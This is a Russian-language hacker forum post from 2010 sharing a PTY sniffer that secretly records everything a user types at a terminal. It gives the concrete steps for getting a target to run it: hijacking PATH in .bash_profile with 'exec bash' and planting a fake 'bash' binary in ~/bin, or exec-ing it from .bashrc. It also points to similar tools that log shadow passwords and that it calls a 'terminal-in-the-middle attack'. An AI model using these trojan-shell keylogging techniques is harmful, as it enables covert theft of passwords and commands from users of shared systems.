Тема: pty sniffer
Показать сообщение отдельно

pty sniffer
  #1  
Старый 26.02.2010, 04:06
ShAnKaR
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами: 10960226

Репутация: 1424


По умолчанию pty sniffer

работает пока только на linux и freebsd.

софт записывает в лог все что вводит на терминале юзер запустивший этот бинарник, да да это чтоб не забыть какие команды мы выполняли .
заставить запустить его- оптимальный вариант пока на мой взгляд- если не имеем рутовых прав то прописать в
.bash_profile
вместо
Цитата:
PATH=$PATH:$HOME/bin
как обычно бывает, -
Цитата:
PATH=$HOME/bin:$PATH
exec bash
и положить бинарник с именем bash соответственно в папку ~/bin/

или как написано у subtty
Цитата:
You could for example call subtty from a .bashrc file
(if [ -z "$SUBTTY" ]; then exec ~/.subtty; fi).
в зависимости от дефолтного шела юзера это может также быть и sh и тп.

вобще возможно есть варианты реализации подобного функционала менее геморные но с тем же результатом но к сожалению я о них не знаю.

по аналогии также существует еще такой софт:
sh2log- нужен рут, имеет сервер который и принимает все логи, ( взял от туда некоторые фишки ).
также аналог subtty ,к сожалению там уже скомпилированный бинарник под linux, логирует правда только теневые пароли

Цитата:
Subtty works by performing a subversive-terminal-in-the-middle attack
так они назвали эту методику.
Вложения
Тип файла: txt bash.txt (3.6 Кб, 14 просмотров)

Последний раз редактировалось ShAnKaR; 09.04.2010 в 05:00..
 
Ответить с цитированием